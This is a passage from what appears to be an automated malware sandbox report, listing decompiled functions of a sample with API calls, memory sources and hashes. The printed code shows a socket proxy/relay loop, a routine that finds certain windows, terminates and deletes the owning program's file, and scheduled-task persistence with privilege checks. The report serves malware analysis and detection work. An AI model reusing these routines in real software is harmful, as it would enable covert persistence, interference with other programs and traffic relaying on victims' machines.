						_push(_a12);
						_push(_t24);
						_push(_a4);
						L004030A2(); // executed
						if(_t20 > 0) {
							_a12 = _a12 - _t20;
							_t24 = _t24 + _t20;
							_t12 =  &_v8;
							 *_t12 = _v8 - 1;
							if( *_t12 != 0) {
								continue;
							}
						}
					}
					break;
				}
				if(_a16 != 0) {
					SetEvent(_a16);
				}
				return _a12;
			}

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 004029B2
select.WSOCK32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 004029DA
send.WSOCK32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 004029ED
SetEvent.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?), ref: 00402A0F

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: EventObjectSingleWaitselectsend
String ID:
API String ID: 3746265427-0
Opcode ID: d673634364e9625ba48aa96f4191a993b34a4fc1473bfdbe5eb78cfbe0526b97
Instruction ID: d54d53443cf9217a947d93b0e8418d9fb27df71b2428d5f491059bff16967c37
Opcode Fuzzy Hash: d673634364e9625ba48aa96f4191a993b34a4fc1473bfdbe5eb78cfbe0526b97
Instruction Fuzzy Hash: EC115E31600249AAEF20DE55CE4AFDF3B6CAB00715F100137BA11B51D0C7F99A60CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00720DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00720223,?,?), ref: 00720E02
SetErrorMode.KERNELBASE(00000000,?,?,00720223,?,?), ref: 00720E07

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 4fdb2921f34b501e2c9b951b2e492534eb8af8743f7e4338964c077f768e7802
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: E2D0123154512C77D7002A94DC09BCDBB1C9F05B66F008051FB0DD9181C7749D4046F5

Uniqueness

Uniqueness Score: -1.00%

Function 0074FAA1, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Module32First.KERNEL32(00000000,00000224), ref: 0074FAE9

Memory Dump Source

Source File: 00000005.00000002.516328713.000000000074E000.00000040.00000001.sdmp, Offset: 0074E000, based on PE: false

Similarity

API ID: FirstModule32
String ID:
API String ID: 3757679902-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 07e6e82ce67b1e082f093219a88052c09d8c19e8913b97fcdae15b084630371c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: AFF062322007156BD7203AF9A88DB6A76E8AF4A724F104539E646D10C0DBB8E8454661

Uniqueness

Uniqueness Score: -1.00%

Function 0074F760, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0074F7B1

Memory Dump Source

Source File: 00000005.00000002.516328713.000000000074E000.00000040.00000001.sdmp, Offset: 0074E000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 34fb53c1c543e787f2c94ff3e91c8b1a1793a5f2103daee1f6c2770b6d6cdd1c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 04113C79A00208EFDB01DF98C985E98BFF5AF08351F0580A5F9489B362D375EA50DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00721BCF, Relevance: 25.0, APIs: 12, Strings: 2, Instructions: 494memorynetworkthreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?,?,?,?,?,00721811,?), ref: 00721C12
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 00721C30
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00721CC0
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00405081,?,00000032,?,98000004,00000001,0000000C,00000000), ref: 00721D0E
select.WS2_32(00000000,?,00000000,00000000,?), ref: 00721D6D
GetTempPathA.KERNEL32(00000200,?,?,?,00000007,?,00405081,00000032,3173702E,00000004,00405081,00000032,?,00000003,00000023,?), ref: 00721FF9

Part of subcall function 007222F8: CoInitialize.OLE32(00000000), ref: 0072232C

VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00405081,00000032,?,00000000,?,00000000,00000002,?,?,00000000,?,?), ref: 00722112
socket.WS2_32(00000002,00000001,00000006), ref: 00722172
socket.WS2_32(00000017,00000001,00000006), ref: 0072217F
CreateThread.KERNEL32(00000000,00000000,004015FC,?,00000000,00000000), ref: 007221BC
CloseHandle.KERNEL32(?,?,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 007222BA
ExitProcess.KERNEL32(00000000,0040510B,?,?,?,?,?,?,00000064,00000000,00405081,00000032,?,00000032,00000000,00000000), ref: 007222E6

Part of subcall function 00722C6E: select.WS2_32(00000000,?,00000000,00000000,?), ref: 00722CA0

Strings

.ps1, xrefs: 00721F65
exe, xrefs: 00722022, 00722028

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: AllocVirtual$selectsocket$CloseCreateExitHandleInformationInitializeIoctlPathProcessTempThreadVolume
String ID: .ps1$exe
API String ID: 2898658977-3476276980
Opcode ID: f7307226bdd116e6dbdf97e9d4f561f64b7fd0ca7a184a8d8671f3bf07478583
Instruction ID: 507f1b3e2c05f04e70973b74323432dc142c2322504c6b57ae04ce13d303f958
Opcode Fuzzy Hash: f7307226bdd116e6dbdf97e9d4f561f64b7fd0ca7a184a8d8671f3bf07478583
Instruction Fuzzy Hash: 0512A170D44268FEEB319BA0DC46FD9B7B8BF14700F104199F654AA0D2C7B9AA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00402487, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91
sleepfilethreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00402487(void* __eflags, struct HWND__* _a4) {
				char _v16;
				char _v260;
				char _v516;
				long _v520;
				char _v648;
				char* _v652;
				intOrPtr _v656;
				void* _v660;
				void* _v664;
				int _t33;
				void* _t36;
				void* _t45;
				CHAR* _t46;
				void* _t51;
				void* _t53;

				E00402BA3( &_v664,  &_v16 - _t53);
				GetWindowThreadProcessId(_a4,  &_v520);
				if(_v520 == GetCurrentProcessId()) {
					L9:
					return 1;
				}
				GetClassNameA(_a4,  &_v260, 0x100);
				_t33 = GetWindowTextA(_a4,  &_v516, 0x100);
				_t56 = _t33;
				if(_t33 == 0) {
					goto L9;
				}
				_t36 = E00402CFF(_t56, "win32app",  &_v260);
				_t57 = _t36;
				if(_t36 != 0 && E00402CFF(_t57, "Microsoft",  &_v516) != 0) {
					_t51 = 0x80;
					do {
						_t38 = E00402D95(_t38, 0x80);
						asm("stosb");
						_t51 = _t51 - 1;
					} while (_t51 != 0);
					_v660 = E00402D95(_t38, 0xee6b2800);
					_v656 = E00402D95(_t39, 0x80) + 1;
					_v652 =  &_v648;
					SendMessageA(_a4, 0x4a, 0,  &_v660);
					_t45 = OpenProcess(0x410, 0, _v520);
					if(_t45 != 0) {
						_v664 = _t45;
						_push(0x100);
						_t46 =  &_v260;
						_push(_t46);
						_push(0);
						_push(_v664);
						L004030F0();
						if(_t46 != 0) {
							Sleep(0x3e8);
							DeleteFileA( &_v260);
						}
					}
				}
			}

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 004024AD
GetCurrentProcessId.KERNEL32(?,?), ref: 004024B2
GetClassNameA.USER32(?,?,00000100), ref: 004024D2
GetWindowTextA.USER32 ref: 004024E6
SendMessageA.USER32 ref: 00402579
OpenProcess.KERNEL32(00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft,?,win32app,?,?,?), ref: 0040258B
GetModuleFileNameExA.PSAPI(?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft,?), ref: 004025AE
Sleep.KERNEL32(000003E8,?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft), ref: 004025BC
DeleteFileA.KERNEL32(?,000003E8,?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080), ref: 004025C8

Strings

win32app, xrefs: 004024FA
Microsoft, xrefs: 00402513

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$FileNameWindow$ClassCurrentDeleteMessageModuleOpenSendSleepTextThread
String ID: Microsoft$win32app
API String ID: 3712944067-2644191155
Opcode ID: b48bd617c86b2e13b715fe2d4633e8373233a46ad0613f9fa8ab91248206afb4
Instruction ID: 031a9dd2b1e095ba21a28822d09a49bd2918d4b5860b702cf13631af9897ca23
Opcode Fuzzy Hash: b48bd617c86b2e13b715fe2d4633e8373233a46ad0613f9fa8ab91248206afb4
Instruction Fuzzy Hash: 763147715112197AEB21AB51CD4AFEE77BCEF04344F4040BBB544F51C1EAF49E849B68

Uniqueness

Uniqueness Score: -1.00%

Function 004015FC, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 276
networkCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004015FC(void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				signed int _v51;
				signed int _v52;
				intOrPtr _v88;
				short _v90;
				char _v92;
				char _v96;
				char _v112;
				char _v116;
				short _v118;
				char _v120;
				char _v128;
				char _v140;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				signed short _t146;
				signed short _t158;
				char* _t167;
				char* _t172;
				intOrPtr _t181;
				signed int _t182;
				signed int _t185;
				intOrPtr* _t190;
				signed int _t191;
				char* _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				void* _t196;

				E00402BA3( &_v160,  &_v16 - _t196);
				_t193 = _a4;
				E00402B1C(_t193 + 0x180,  &_v32, 4);
				E00402B1C(_t193 + 0x184,  &_v16, 4);
				E00402B1C(_t193 + 0x188,  &_v24, 4);
				E00402B1C(_t193 + 0x18c,  &_v8, 4);
				E00402B1C(_t193 + 0x190,  &_v20, 4);
				_t185 = _v16;
				_t190 = _v8;
				_v28 =  *((intOrPtr*)(_t190 + _t185 * 4));
				_v12 =  *_t190;
				_v52 = _t185;
				_v51 = 0xa;
				_v49 = 5;
				_v48 = 1;
				_v47 = 0;
				_v46 = 1;
				_v45 = 0;
				_v44 = 0;
				_v43 = 0;
				_v42 = 0;
				_v41 = 0;
				_v40 = 0;
				_v92 = 2;
				_t198 =  *((char*)(_t193 + 7)) - 3;
				if( *((char*)(_t193 + 7)) != 3) {
					__eflags =  *((char*)(_t193 + 7)) - 1;
					if( *((char*)(_t193 + 7)) != 1) {
						__eflags =  *((char*)(_t193 + 7)) - 4;
						if( *((char*)(_t193 + 7)) != 4) {
							L14:
							_t194 = _v8;
							_t182 = _v16;
							_t191 = _v51 & 0x0000ffff;
							E004025D9(0x405081, 0x32,  &_v52, 3);
							E004025D9(0x405081, 0x32,  &_v49, _t191);
							_t83 = _t191 + 3; // 0xd
							E00402997(_v12,  &_v52, _t83, _v24);
							E004025D9(0x405081, 0x32,  &_v52, 3);
							_t146 = E004025D9(0x405081, 0x32,  &_v49, _t191);
							if(_v48 != 0) {
								L24:
								 *((intOrPtr*)(_t194 + _t182 * 4)) = 0;
								E00402A71(_t146, _v28);
								_v51 = 0;
								E004025D9(0x405081, 0x32,  &_v52, 3);
								E00402997(_v12,  &_v52, 3, _v24);
								E0040151C( &_v20);
								 *((intOrPtr*)(_v32 + _t182 * 4)) = 0;
								return 0;
							}
							_t192 = _v20;
							while(1) {
								L16:
								while( *((intOrPtr*)(_t194 + _t182 * 4)) != 0) {
									E00402B69(_v28, 0,  &_v140, 0, 0x64);
									_push( &_v128);
									_push(0);
									_push(0);
									_t146 =  &_v140;
									_push(_t146);
									_push(0);
									L0040309C();
									__eflags = _t146;
									if(__eflags == 0) {
										goto L16;
									}
									if(__eflags < 0) {
										goto L24;
									}
									_push(0);
									_push(0xfffa);
									_t158 = _t192 + 3;
									_push(_t158);
									_push(_v28);
									L00403096();
									_t146 = _t158;
									__eflags = _t146;
									if(_t146 == 0) {
										L21:
										goto L24;
									}
									__eflags = _t146 - 0xffffffff;
									if(_t146 != 0xffffffff) {
										 *(_t192 + 1) = _t146;
										 *_t192 = _v16;
										E004025D9(0x405081, 0x32, _t192, 3);
										E004025D9(0x405081, 0x32, _t192 + 3,  *(_t192 + 1) & 0x0000ffff);
										_t146 = E00402997(_v12, _t192, ( *(_t192 + 1) & 0x0000ffff) + 3, _v24);
										continue;
									}
									goto L21;
								}
								goto L24;
							}
						}
						_v120 = 0x17;
						_v116 = 0;
						_v96 = 0;
						_v118 =  *((intOrPtr*)(_t193 + 0x18));
						E00402B1C(_t193 + 8,  &_v112, 0x10);
						L8:
						_v144 = 1;
						_t167 =  &_v144;
						_push(_t167);
						_push(0x8004667e);
						_push(_v28);
						L00403090();
						if(_t167 == 0) {
							if( *((char*)(_t193 + 7)) == 4) {
								_push(0x1c);
								_push( &_v120);
								_push(_v28);
								L00403084();
							} else {
								_push(0x10);
								_push( &_v92);
								_push(_v28);
								L00403084();
							}
							E00402B69(_v28, 0,  &_v140, 0xa, 0);
							_push( &_v128);
							_push(0);
							_t172 =  &_v140;
							_push(_t172);
							_push(0);
							_push(0);
							L0040309C();
							if(_t172 == 1) {
								_v144 = 0;
								_push( &_v144);
								_push(0x8004667e);
								_push(_v28);
								L00403090();
								_v156 = 1;
								_v152 = 0xea60;
								_v148 = 0x2710;
								_push(0);
								_push(0);
								_push( &_v160);
								_push(0);
								_push(0);
								_push(0xc);
								_push( &_v156);
								_push(0x98000004);
								_push(_v28);
								L004030C0();
								_v48 = 0;
							}
						}
						goto L14;
					}
					_v88 =  *((intOrPtr*)(_t193 + 8));
					_v90 =  *((intOrPtr*)(_t193 + 0xc));
					goto L8;
				}
				_v90 =  *((intOrPtr*)(0 + _t193 + 9));
				 *((char*)(0 + _t193 + 9)) = 0;
				_t181 = E00402A90(_t198, _t193 + 9, 2);
				if(_t181 == 0) {
					goto L14;
				} else {
					_v88 = _t181;
					goto L8;
				}
			}

APIs

ioctlsocket.WSOCK32(?,8004667E,00000001,?,?,?,?,?,00000010), ref: 00401755
connect.WSOCK32(?,00000002,00000010,?,8004667E,00000001,?,?,?,?,?,00000010), ref: 00401771
connect.WSOCK32(?,00000017,0000001C,?,8004667E,00000001,?,?,?,?,?,00000010), ref: 00401781
select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C,?,8004667E,00000001), ref: 004017AC
ioctlsocket.WSOCK32(?,8004667E,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C), ref: 004017CF
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00401812

Part of subcall function 00402A90: getaddrinfo.WS2_32(?,00000000,?,?), ref: 00402AD8

select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,00405081,00000032,00000005,0000000A,00405081,00000032), ref: 004018B6
recv.WSOCK32(?,?,0000FFFA,00000000,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,00405081,00000032), ref: 004018CF

Strings

`, xrefs: 004017DE

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: connectioctlsocketselect$Ioctlgetaddrinforecv
String ID: `
API String ID: 3309496413-1850852036
Opcode ID: 16a05578df1dec43ef9c83ac8a619502efa8c11c9abb46305217292052c43451
Instruction ID: aaf0a3722a9e06a6a5b8a7ac42030edebb0200d921e59f8858e9fae40fd10b98
Opcode Fuzzy Hash: 16a05578df1dec43ef9c83ac8a619502efa8c11c9abb46305217292052c43451
Instruction Fuzzy Hash: D0B14071940248BAEB21DBE0CC45FEEBBBCAF04704F10406AF655B71D1D7B9AA44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0072184C, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 276networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E,00000001), ref: 007219A5
connect.WS2_32(?,00000002,00000010), ref: 007219C1
connect.WS2_32(?,00000017,0000001C), ref: 007219D1
select.WS2_32(00000000,00000000,?,00000000,?), ref: 007219FC
ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00721A1F
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00721A62
select.WS2_32(00000000,?,00000000,00000000,?), ref: 00721B06

Strings

`, xrefs: 00721A2E

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: connectioctlsocketselect$Ioctl
String ID: `
API String ID: 2054606664-1850852036
Opcode ID: 436abe1d07a41c43e4658ce75f9b41527e3e02da19e43e5be8656f078b20de82
Instruction ID: c69ff1c73438db423cb0f059fd27709136b45420c05e559f3a852c0c2ba7df09
Opcode Fuzzy Hash: 436abe1d07a41c43e4658ce75f9b41527e3e02da19e43e5be8656f078b20de82
Instruction Fuzzy Hash: DEB17F71900258FAEB21DBE0DC46FEEBBB8AF04700F504059F645B6182D779AA49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004020A8, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239
timecomCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E004020A8(void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				char _v1032;
				char _v1036;
				void* _v1040;
				char _v1044;
				intOrPtr _v1068;
				intOrPtr _v1072;
				short _v1074;
				short _v1076;
				short _v1078;
				short _v1080;
				short _v1082;
				short _v1084;
				short _v1086;
				short _v1088;
				char _v1092;
				void* _v1096;
				struct _SYSTEMTIME _v1112;
				struct _FILETIME _v1120;
				char _v1376;
				char _v1888;
				char _v2144;
				char _v2400;
				char _v2656;
				char _v2912;
				char _v3168;
				char _v3424;
				char* _t100;
				intOrPtr* _t109;
				intOrPtr* _t112;
				intOrPtr* _t113;
				void* _t118;
				intOrPtr* _t120;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t130;
				intOrPtr* _t133;
				void* _t141;
				short _t149;
				intOrPtr* _t152;
				intOrPtr* _t158;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t167;
				intOrPtr* _t172;

				E00402CB2(__eflags, _a4,  &_v1376);
				E00402CB2(__eflags, _a12,  &_v1888);
				E004023E6(__eflags, _a4);
				_push(0);
				L004030D8();
				E00402BBA(0x4050bb, 0x10,  &_v2400);
				E00402BBA(0x4050cb, 0x10,  &_v2656);
				_push( &_v8);
				_push( &_v2656);
				_push(1);
				_push(0);
				_t100 =  &_v2400;
				_push(_t100);
				L004030D2();
				if(_t100 >= 0) {
					E00402BBA(0x4050db, 0x10,  &_v2912);
					E00402BBA(0x4050eb, 0x10,  &_v3168);
					_push( &_v12);
					_push( &_v2912);
					_push( &_v3168);
					_push( &_v1376);
					_t109 = _v8;
					_push(_t109);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t109 + 0x20))))() >= 0) {
						_t113 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 0x70))))(_t113, 0x2202);
						E00402BA3( &_v1036, 0x400);
						_t118 = E0040287E();
						if(_t118 != 0x4000 && _t118 != 0x3000) {
							_v1036 = 0x100;
							_push( &_v1036);
							_push( &_v1032);
							_push(2);
							L004030EA();
						}
						_t120 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x78))))(_t120,  &_v1032, 0);
						_t124 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x80))))(_t124,  &_v1888);
						_t207 = _a16;
						if(_a16 != 0) {
							E00402CB2(_t207, _a16,  &_v2144);
							_t172 = _v12;
							 *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x88))))(_t172,  &_v2144);
						}
						_t126 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0xa8))))(_t126, 0xd65cb580);
						_push( &_v1040);
						_push( &_v1044);
						_t130 = _v12;
						_push(_t130);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0xc))))() >= 0) {
							E00402BA3( &_v1092, 0x30);
							GetLocalTime( &_v1112);
							SystemTimeToFileTime( &_v1112,  &_v1120);
							_t141 = 0x47868c00;
							if(_a20 == 1) {
								_t141 = 0x29b92700;
							}
							_v1120.dwLowDateTime = _v1120.dwLowDateTime + _t141;
							asm("adc [ebp-0x458], edx");
							FileTimeToSystemTime( &_v1120,  &_v1112);
							if(_a20 == 0) {
								_v1072 = 0x80520;
								_v1068 = 2;
							}
							_v1092 = 0x30;
							_v1074 = _v1112.wMinute;
							_v1076 = _v1112.wHour;
							_v1084 = _v1112.wDay;
							_v1086 = _v1112.wMonth;
							_t149 = _v1112.wYear;
							_v1088 = _t149;
							_v1082 = _t149 + 0x64;
							_v1080 = 1;
							_v1078 = 1;
							_t152 = _v1040;
							 *((intOrPtr*)( *((intOrPtr*)( *_t152 + 0xc))))(_t152,  &_v1092);
							E00402BBA(0x4050fb, 0x10,  &_v3424);
							_push( &_v1096);
							_push( &_v3424);
							_t158 = _v12;
							_push(_t158);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t158))))() >= 0) {
								_t163 = _v1096;
								 *((intOrPtr*)( *((intOrPtr*)( *_t163 + 0x18))))(_t163, 0, 1);
								if(_a24 != 0) {
									_t167 = _v12;
									 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x30))))(_t167);
								}
								_t165 = _v1096;
								 *((intOrPtr*)( *((intOrPtr*)( *_t165 + 8))))(_t165);
							}
							_t161 = _v1040;
							 *((intOrPtr*)( *((intOrPtr*)( *_t161 + 8))))(_t161);
						}
						_t133 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 8))))(_t133);
					}
					_t112 = _v8;
					_t100 =  *((intOrPtr*)( *((intOrPtr*)( *_t112 + 8))))(_t112);
				}
				L004030DE();
				return _t100;
			}

0x004020be
0x004020cd
0x004020d5
0x004020da
0x004020dc
0x004020ef
0x00402102
0x0040210a
0x00402111
0x00402112
0x00402114
0x00402116
0x0040211c
0x0040211d
0x00402125
0x00402139
0x0040214c
0x00402154
0x0040215b
0x00402162
0x00402169
0x0040216a
0x0040216f
0x00402178
0x00402183
0x0040218c
0x0040219a
0x0040219f
0x004021a9
0x004021b5
0x004021c5
0x004021cc
0x004021cd
0x004021cf
0x004021cf
0x004021dd
0x004021e6
0x004021ef
0x004021fb
0x004021fd
0x00402201
0x0040220d
0x00402219
0x00402225
0x00402225
0x0040222c
0x00402238
0x00402240
0x00402247
0x00402248
0x0040224d
0x00402256
0x00402265
0x00402271
0x00402284
0x00402289
0x00402292
0x00402294
0x00402294
0x0040229b
0x004022a1
0x004022b5
0x004022be
0x004022c0
0x004022ca
0x004022ca
0x004022d4
0x004022e4
0x004022f2
0x00402300
0x0040230e
0x00402315
0x0040231c
0x00402327
0x0040232e
0x00402337
0x00402347
0x00402353
0x00402363
0x0040236e
0x00402375
0x00402376
0x0040237b
0x00402383
0x00402389
0x00402395
0x0040239b
0x0040239d
0x004023a6
0x004023a6
0x004023a8
0x004023b4
0x004023b4
0x004023b6
0x004023c2
0x004023c2
0x004023c4
0x004023cd
0x004023cd
0x004023cf
0x004023d8
0x004023d8
0x004023da
0x004023e3

APIs

Part of subcall function 004023E6: CoInitialize.OLE32(00000000), ref: 00402404
Part of subcall function 004023E6: CoCreateInstance.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,?,?,?,?,000000C7), ref: 00402445
Part of subcall function 004023E6: CoUninitialize.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,?,?,?,?,000000C7), ref: 0040247B

CoInitialize.OLE32(00000000), ref: 004020DC
CoCreateInstance.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,00000000,?,?,?,?), ref: 0040211D
CoUninitialize.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,00000000,?,?,?,?), ref: 004023DA

Part of subcall function 0040287E: GetCurrentProcess.KERNEL32 ref: 00402895
Part of subcall function 0040287E: OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 004028A3
Part of subcall function 0040287E: LocalAlloc.KERNEL32(00000000,?,00000000,00000008,?), ref: 004028B5
Part of subcall function 0040287E: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,00000000,00000008,?), ref: 004028CC
Part of subcall function 0040287E: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028DA
Part of subcall function 0040287E: LocalAlloc.KERNEL32(00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 004028E4
Part of subcall function 0040287E: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000), ref: 004028FB
Part of subcall function 0040287E: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040290B
Part of subcall function 0040287E: LocalFree.KERNEL32(?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 00402923
Part of subcall function 0040287E: CloseHandle.KERNEL32(?,?,?,TokenIntegrityLevel,?,?,?,00000000,?,00000000,00000008,?), ref: 0040292B

GetUserNameExW.SECUR32(00000002,?,?,?,00000400,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 004021CF
GetLocalTime.KERNEL32(?,?,00000030,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018,?,?,?,00000002), ref: 00402271
SystemTimeToFileTime.KERNEL32(?,?,?,?,00000030,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018,?,?), ref: 00402284
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00000030,?,00401E9A,?,00000014,?,00000000,00000001,00000000,00000018), ref: 004022B5

Strings

0, xrefs: 004022D4

Memory Dump Source

Source File: 00000005.00000002.516149036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: LocalTime$Token$AllocCreateFileFreeInformationInitializeInstanceProcessSystemUninitialize$AuthorityCloseCurrentHandleNameOpenUser
String ID: 0
API String ID: 1653648096-4108050209
Opcode ID: d395cb220eb956024b502c6637439d2dc67df5ecc9007aded98e7e5467c2c288
Instruction ID: d2504d8edf1705ddb07240cfd3e684c56b7407d0b8a9720604ede3a4450b607e
Opcode Fuzzy Hash: d395cb220eb956024b502c6637439d2dc67df5ecc9007aded98e7e5467c2c288
Instruction Fuzzy Hash: D3A10BB5900618AFDB10DF94CD85FDAB3BCAF48304F1040EAE609E7291D679AE85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00722ACE, Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00722B2A
LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00722B34
GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00722B4B
GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00722B5B
LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00722B73
CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00722B7B

Memory Dump Source

Source File: 00000005.00000002.516276984.0000000000720000.00000040.00000001.sdmp, Offset: 00720000, based on PE: false

Similarity

API ID: Local$Free$AllocAuthorityCloseHandleInformationToken
String ID:
API String ID: 1586583212-0
